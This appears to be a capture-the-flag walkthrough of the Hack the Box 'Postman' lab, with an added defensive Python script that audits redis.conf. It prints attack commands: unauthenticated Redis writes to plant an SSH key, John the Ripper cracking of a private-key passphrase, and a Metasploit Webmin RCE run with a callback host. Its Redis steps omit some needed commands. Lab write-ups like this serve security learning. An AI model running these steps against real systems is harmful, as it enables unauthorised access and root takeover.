Hack the Box: Postman Walkthrough


Today we’re sharing another Hack the Box challenge walkthrough: POSTMAN, designed by The Cyber Geek. The machine is part of the retired lab, so you can connect to it using your HTB VPN and start solving the CTF.
The difficulty level of the lab is: Beginner to intermediate.
Task: Capture the user.txt and root.txt flags.

Penetration Methodologies
Network Scanning
·         Nmap
Enumeration
·         Redis
Initial Foothold
·         Access SSH
Privilege Escalation
·         Webmin

Network Scanning
Since we know the IP of the victim machine, we begin with an Nmap scan to identify open ports and the services running on them.
nmap -A 10.10.10.160
From this scan we find port 80 open for HTTP and port 22 open for SSH. In addition, I noticed that port 10000 for Webmin and port 6379 for Redis are open.


Enumeration
The Redis security model is: “it’s totally insecure to let untrusted clients access the system, the ability to control the server configuration using the CONFIG command makes the client able to change the working directory of the program and the name of the dump file. This allows clients to write RDB Redis files at random paths, that is a security issue that may easily lead to the ability to run untrusted code as the same user as Redis is running”.
You can read more about it from here: http://antirez.com/news/96
Since we saw that port 6379 is open for Redis, we try to talk to it with the redis-cli client.

redis-cli -h 10.10.10.160
config get dir
We notice that Redis is insecure and no AUTH is required, and the configured working directory is the .ssh directory of the redis user. Because of this unsafe configuration, as described in the article above, we can write arbitrary files on the server.
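Added example, not part of the original walkthrough: a small Python audit that parses a redis.conf and flags the settings behind the exposure seen here (no AUTH, listening on all interfaces, and a CONFIG command that lets any client change dir and dbfilename). The two sample configurations and the placeholder password are constructed for the example.

```python
import re

# Matches an active "directive value..." line; comments and blanks are skipped.
_DIRECTIVE = re.compile(r"^\s*([A-Za-z][\w-]*)\s+(.*?)\s*$")

def parse_redis_conf(text):
    """Return {directive: [values]} for the active lines of a redis.conf."""
    conf = {}
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = _DIRECTIVE.match(line)
        if m:
            conf.setdefault(m.group(1).lower(), []).append(m.group(2))
    return conf

def config_is_renamed(conf):
    """True if CONFIG was disabled (renamed to "") or given another name."""
    for value in conf.get("rename-command", []):
        parts = value.split()
        if len(parts) == 2 and parts[0].upper() == "CONFIG" and parts[1].upper() != "CONFIG":
            return True
    return False

def audit_redis_conf(text):
    """Return a list of findings; an empty list means the checked settings are sane."""
    conf = parse_redis_conf(text)
    findings = []
    # No bind directive means Redis listens on every interface (the default).
    binds = " ".join(conf.get("bind", [])).split()
    if not binds or any(b in ("0.0.0.0", "::", "*") for b in binds):
        findings.append("bind: listening on all interfaces")
    if conf.get("protected-mode", ["yes"])[-1].lower() != "yes":
        findings.append("protected-mode: disabled")
    if "requirepass" not in conf:
        findings.append("requirepass: no AUTH required")
    if not config_is_renamed(conf):
        findings.append("rename-command: CONFIG reachable, so dir/dbfilename can be changed by any client")
    return findings

# Constructed sample configs; the first reflects the exposure seen on the box.
WEAK_CONF = "bind 0.0.0.0\nprotected-mode no\nport 6379\ndir /var/lib/redis/.ssh\n"
HARDENED_CONF = ("bind 127.0.0.1\nprotected-mode yes\nport 6379\n"
                 "requirepass CHANGE-ME-placeholder\n"  # placeholder secret, not a real one
                 'rename-command CONFIG ""\n')

if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_redis_conf(conf) or ["ok"])
```

Run it against a real /etc/redis/redis.conf to see which of the four settings would have let an unauthenticated client do what this walkthrough does.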


Next, I generate an SSH key pair using the ssh-keygen command given below:
ssh-keygen -t rsa -f raj


Now I have a key, and my goal is to place it in the server’s memory and then write it out to a file in such a way that the resulting authorized_keys file remains valid.
(echo -e "\n\n"; cat raj.pub; echo -e "\n\n") > foo.txt
cat foo.txt | redis-cli -h 10.10.10.160 -x set crackit


Initial Foothold
As we have uploaded our SSH key to the server, it’s time to connect to the remote machine with the following commands:
ssh -i raj redis@10.10.10.160
ls -la
cat .bash_history

Here we notice two things: first, there is a user named “Matt”, and second, a file named “id_rsa.bak”; let’s find out the path of this file.


So, with the help of the find command we enumerate the path of the id_rsa.bak file, which lies inside the /opt directory.
find / -user Matt 2>/dev/null


So id_rsa.bak is actually the id_rsa private key; I copied it into a text file and saved it as hash.


Then we used ssh2john to convert this SSH key into a file that John the Ripper can crack, and used the rockyou.txt wordlist for it.
python /usr/share/john/ssh2john.py sshkey > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash

Hmmm!! So we have obtained the SSH key passphrase “computer2008” for the user Matt.


As we know that Webmin is running on port 10000, we open it in the web browser and log in with the credentials enumerated above.
username: Matt
Password: computer2008


Boom! We logged in successfully and notice the installed Webmin version, 1.910; now we can search for an exploit, if one is available.


With the help of searchsploit we found a Metasploit module for remote command execution. This module exploits an arbitrary command execution vulnerability in Webmin 1.910 and lower versions: any user authorised to use the "Package Updates" module can execute arbitrary commands with root privileges.



Without wasting time, we load the Metasploit module and set the values required to run the exploit:
msfconsole
msf > use exploit/linux/http/webmin_packageup_rce
msf exploit(webmin_packageup_rce) > set rhosts 10.10.10.160
msf exploit(webmin_packageup_rce) > set lhost 10.10.15.243
msf exploit(webmin_packageup_rce) > set username Matt
msf exploit(webmin_packageup_rce) > set password computer2008
msf exploit(webmin_packageup_rce) > set ssl true
msf exploit(webmin_packageup_rce) > exploit

Booom!!! We got a Meterpreter session with root privileges; let’s enumerate the flags.



Let’s capture both flags, user.txt and root.txt, from /home/Matt/ and /root respectively.
cat /root/root.txt
cat /home/Matt/user.txt
Conclusion: In this machine we have learned about two major vulnerabilities and their exploitation: the first was an insecure Redis and the other was Webmin.
